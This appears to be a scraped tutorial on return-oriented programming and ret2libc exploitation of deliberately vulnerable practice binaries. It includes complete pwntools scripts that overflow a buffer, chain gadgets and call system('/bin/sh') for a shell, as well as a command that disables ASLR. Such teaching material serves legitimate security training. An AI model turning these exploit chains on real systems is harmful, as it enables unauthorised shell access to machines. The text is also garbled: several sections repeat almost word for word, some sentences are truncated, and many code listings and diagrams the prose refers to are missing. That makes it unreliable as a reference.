1 of 6

Return-Oriented Programming

Bypassing NX

The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command, such as cat flag.txt, and then pass it as a parameter to system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell much like the shellcode we used did.

Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.

Calling Conventions

A more in-depth look into parameters for 32-bit and 64-bit programs

One Parameter

Source

Let's have a quick look at the source:

Pretty simple.

If we run the 32-bit and 64-bit versions, we get the same output:

Just what we expected.

Analysing 32-bit

Let's open the binary up in radare2 and disassemble it.

If we look closely at the calls to sym.vuln, we see a pattern:

We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.

The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.

Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:

Clearly that's our parameter.

So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:

Analysing 64-bit

Let's disassemble main again here.

Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again we can check rdi with the command

Just dr will display all registers

Awesome.

Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address

Multiple Parameters

Source

32-bit

We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.

It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.

So it becomes quite clear how more parameters are placed on the stack:

64-bit

So as well as rdi, we also push to rdx and rsi (or, in this case, their lower 32 bits).

Bigger 64-bit values

Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilise a bigger number:

If you disassemble main, you can see it disassembles to

movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if it's a mov.

Gadgets

Controlling execution with snippets of code

Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.

Example

Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.

What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:

And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.

Utilising Gadgets

When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, it points at the next value at the stack - but wait. We can overwrite the next value in the stack.

Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.

On the original ret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.

rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.

RSP moves onto the next items on the stack, the address of flag(). The ret is executed and flag() is called.

Summary

Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:

Note if you have multiple pop instructions, you can just add more values.

We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.

Finding Gadgets

Combine it with grep to look for specific registers.

Exploiting Calling Conventions

Utilising Calling Conventions

32-bit

The program expects the stack to be laid out like this before executing the function:

So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.

Everything after the address of flag() will be part of the stack frame for the next function as it is expected to be there - just instead of using push instructions we just overwrote them manually.

from pwn import *

p = process('./vuln-32')

payload = b'A' * 52            # Padding up to EIP
payload += p32(0x080491c7)     # Address of flag()
payload += p32(0x0)            # Return address - don't care if crashes when done
payload += p32(0xdeadc0de)     # First parameter
payload += p32(0xc0ded00d)     # Second parameter

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

64-bit

Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).

We have to fill the registers before the function is called

from pwn import *

p = process('./vuln-64')

POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9


payload = b'A' * 56            # Padding
payload += p64(POP_RDI)        # pop rdi; ret
payload += p64(0xdeadc0de)     # value into rdi -> first param
payload += p64(POP_RSI_R15)    # pop rsi; pop r15; ret
payload += p64(0xc0ded00d)     # value into rsi -> first param
payload += p64(0x0)            # value into r15 -> not important
payload += p64(0x40116f)       # Address of flag()
payload += p64(0x0)

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

ret2libc

The standard ROP exploit

A ret2libc is based off the system function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.

And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?

Disabling ASLR

To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Manual Exploitation

Getting Libc and its base

Fortunately Linux has a command called ldd for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.

$ ldd vuln-32 
	linux-gate.so.1 (0xf7fd2000)
	libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
	/lib/ld-linux.so.2 (0xf7fd3000)

We need libc.so.6, so the base address of libc is 0xf7dc2000.

Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.

Getting the location of system()

To call system, we obviously need its location in memory. We can use the readelf command for this.

$ readelf -s /lib32/libc.so.6 | grep system

1534: 00044f00    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0

The -s flag tells readelf to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00.

Getting the location of /bin/sh

Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.

$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh

-a tells it to scan the entire file; -t x tells it to output the offset in hex.

32-bit Exploit

from pwn import *

p = process('./vuln-32')

libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

64-bit Exploit

Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).

Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.

$ ROPgadget --binary vuln-64 | grep rdi

[...]
0x00000000004011cb : pop rdi ; ret

from pwn import *

p = process('./vuln-64')

libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143

POP_RDI = 0x4011cb

payload = b'A' * 72         # The padding
payload += p64(POP_RDI)     # gadget -> pop rdi; ret
payload += p64(binsh)       # pointer to command: /bin/sh
payload += p64(system)      # Location of system
payload += p64(0x0)         # return pointer - not important once we get the shell

p.clean()
p.sendline(payload)
p.interactive()

Automating with Pwntools

Unsurprisingly, pwntools has a bunch of features that make this much simpler.

# 32-bit
from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

libc = elf.libc                        # Simply grab the libc it's running with
libc.address = 0xf7dc2000              # Set base address

system = libc.sym['system']            # Grab location of system
binsh = next(libc.search(b'/bin/sh'))  # grab string location

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

The 64-bit looks essentially the same.

Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.

Stack Alignment

A minor issue

A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.

Essentially the . LIBC takes advantage of this and uses to optimise execution; system in particular utilises instructions such as movaps.

That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system.

The fix is simple - in your ROP chain, before the call to system, place a singular ret gadget:

This works because it will cause RSP to be popped an additional time, pushing it forward by 8 bytes and aligning it.

ret2libc

The standard ROP exploit

And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?

Disabling ASLR

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Manual Exploitation

Getting Libc and its base

Fortunately Linux has a command called ldd for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.

$ ldd vuln-32 
	linux-gate.so.1 (0xf7fd2000)
	libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
	/lib/ld-linux.so.2 (0xf7fd3000)

We need libc.so.6, so the base address of libc is 0xf7dc2000.

Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.

Getting the location of system()

To call system, we obviously need its location in memory. We can use the readelf command for this.

$ readelf -s /lib32/libc.so.6 | grep system

1534: 00044f00    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0

The -s flag tells readelf to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00.

Getting the location of /bin/sh

$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh

-a tells it to scan the entire file; -t x tells it to output the offset in hex.

32-bit Exploit

from pwn import *

p = process('./vuln-32')

libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

64-bit Exploit

Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).

Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.

$ ROPgadget --binary vuln-64 | grep rdi

[...]
0x00000000004011cb : pop rdi ; ret

from pwn import *

p = process('./vuln-64')

libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143

POP_RDI = 0x4011cb

payload = b'A' * 72         # The padding
payload += p64(POP_RDI)     # gadget -> pop rdi; ret
payload += p64(binsh)       # pointer to command: /bin/sh
payload += p64(system)      # Location of system
payload += p64(0x0)         # return pointer - not important once we get the shell

p.clean()
p.sendline(payload)
p.interactive()

Automating with Pwntools

Unsurprisingly, pwntools has a bunch of features that make this much simpler.

# 32-bit
from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

libc = elf.libc                        # Simply grab the libc it's running with
libc.address = 0xf7dc2000              # Set base address

system = libc.sym['system']            # Grab location of system
binsh = next(libc.search(b'/bin/sh'))  # grab string location

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

The 64-bit looks essentially the same.

Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.

Calling Conventions

A more in-depth look into parameters for 32-bit and 64-bit programs

One Parameter

Source

Let's have a quick look at the source:

Pretty simple.

If we run the 32-bit and 64-bit versions, we get the same output:

Nice!
Not nice!

Just what we expected.

Analysing 32-bit

Let's open the binary up in radare2 and disassemble it.

$ r2 -d -A vuln-32
$ s main; pdf

0x080491ac      8d4c2404       lea ecx, [argv]
0x080491b0      83e4f0         and esp, 0xfffffff0
0x080491b3      ff71fc         push dword [ecx - 4]
0x080491b6      55             push ebp
0x080491b7      89e5           mov ebp, esp
0x080491b9      51             push ecx
0x080491ba      83ec04         sub esp, 4
0x080491bd      e832000000     call sym.__x86.get_pc_thunk.ax
0x080491c2      053e2e0000     add eax, 0x2e3e
0x080491c7      83ec0c         sub esp, 0xc
0x080491ca      68efbeadde     push 0xdeadbeef
0x080491cf      e88effffff     call sym.vuln
0x080491d4      83c410         add esp, 0x10
0x080491d7      83ec0c         sub esp, 0xc
0x080491da      68dec0adde     push 0xdeadc0de
0x080491df      e87effffff     call sym.vuln
0x080491e4      83c410         add esp, 0x10
0x080491e7      b800000000     mov eax, 0
0x080491ec      8b4dfc         mov ecx, dword [var_4h]
0x080491ef      c9             leave
0x080491f0      8d61fc         lea esp, [ecx - 4]
0x080491f3      c3             ret

If we look closely at the calls to sym.vuln, we see a pattern:

push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln

We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.

[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c      0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c

┌ 74: sym.vuln (int32_t arg_8h);
│           ; var int32_t var_4h @ ebp-0x4
│           ; arg int32_t arg_8h @ ebp+0x8
│           0x08049162 b    55             push ebp
│           0x08049163      89e5           mov ebp, esp
│           0x08049165      53             push ebx
│           0x08049166      83ec04         sub esp, 4
│           0x08049169      e886000000     call sym.__x86.get_pc_thunk.ax
│           0x0804916e      05922e0000     add eax, 0x2e92
│           0x08049173      817d08efbead.  cmp dword [arg_8h], 0xdeadbeef
│       ┌─< 0x0804917a      7516           jne 0x8049192
│       │   0x0804917c      83ec0c         sub esp, 0xc
│       │   0x0804917f      8d9008e0ffff   lea edx, [eax - 0x1ff8]
│       │   0x08049185      52             push edx
│       │   0x08049186      89c3           mov ebx, eax
│       │   0x08049188      e8a3feffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x0804918d      83c410         add esp, 0x10
│      ┌──< 0x08049190      eb14           jmp 0x80491a6
│      │└─> 0x08049192      83ec0c         sub esp, 0xc
│      │    0x08049195      8d900ee0ffff   lea edx, [eax - 0x1ff2]
│      │    0x0804919b      52             push edx
│      │    0x0804919c      89c3           mov ebx, eax
│      │    0x0804919e      e88dfeffff     call sym.imp.puts           ; int puts(const char *s)
│      │    0x080491a3      83c410         add esp, 0x10
│      │    ; CODE XREF from sym.vuln @ 0x8049190
│      └──> 0x080491a6      90             nop
│           0x080491a7      8b5dfc         mov ebx, dword [var_4h]
│           0x080491aa      c9             leave
└           0x080491ab      c3             ret

cmp dword [arg_8h], 0xdeadbeef

Clearly that's our parameter.

So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:

return address        param_1

Analysing 64-bit

Let's disassemble main again here.

0x00401153      55             push rbp
0x00401154      4889e5         mov rbp, rsp
0x00401157      bfefbeadde     mov edi, 0xdeadbeef
0x0040115c      e8c1ffffff     call sym.vuln
0x00401161      bfdec0adde     mov edi, 0xdeadc0de
0x00401166      e8b7ffffff     call sym.vuln
0x0040116b      b800000000     mov eax, 0
0x00401170      5d             pop rbp
0x00401171      c3             ret

dr rdi

Just dr will display all registers

[0x00401153]> db sym.vuln 
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef

Awesome.

Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address

Multiple Parameters

Source

#include <stdio.h>

void vuln(int check, int check2, int check3) {
    if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
    vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}

32-bit

We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.

0x080491dd      680dd0dec0     push 0xc0ded00d
0x080491e2      68dec0adde     push 0xdeadc0de
0x080491e7      68efbeadde     push 0xdeadbeef
0x080491ec      e871ffffff     call sym.vuln
[...]
0x080491f7      6810efcdab     push 0xabcdef10
0x080491fc      6878563412     push 0x12345678
0x08049201      68dec0adde     push 0xdeadc0de
0x08049206      e857ffffff     call sym.vuln

It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.

[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc      0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d

So it becomes quite clear how more parameters are placed on the stack:

return pointer        param1        param2        param3        [...]        paramN

64-bit

0x00401170      ba0dd0dec0     mov edx, 0xc0ded00d
0x00401175      bedec0adde     mov esi, 0xdeadc0de
0x0040117a      bfefbeadde     mov edi, 0xdeadbeef
0x0040117f      e89effffff     call sym.vuln
0x00401184      ba10efcdab     mov edx, 0xabcdef10
0x00401189      be78563412     mov esi, 0x12345678
0x0040118e      bfdec0adde     mov edi, 0xdeadc0de
0x00401193      e88affffff     call sym.vuln

So as well as rdi, we also push to rdx and rsi (or, in this case, their lower 32 bits).

Bigger 64-bit values

Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilise a bigger number:

#include <stdio.h>

void vuln(long check) {
    if(check == 0xdeadbeefc0dedd00d) {
        puts("Nice!");
    }
}

int main() {
    vuln(0xdeadbeefc0dedd00d);
}

If you disassemble main, you can see it disassembles to

movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln

movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if it's a mov.

Gadgets

Controlling execution with snippets of code

Example

Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.

What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:

And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.

Utilising Gadgets

Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.

On the original ret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.

rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.

RSP moves onto the next items on the stack, the address of flag(). The ret is executed and flag() is called.

Summary

Note if you have multiple pop instructions, you can just add more values.

We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.

Finding Gadgets

We can use the tool to find possible gadgets.

$ ROPgadget --binary vuln-64

Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]

Combine it with grep to look for specific registers.

$ ROPgadget --binary vuln-64 | grep rdi

0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret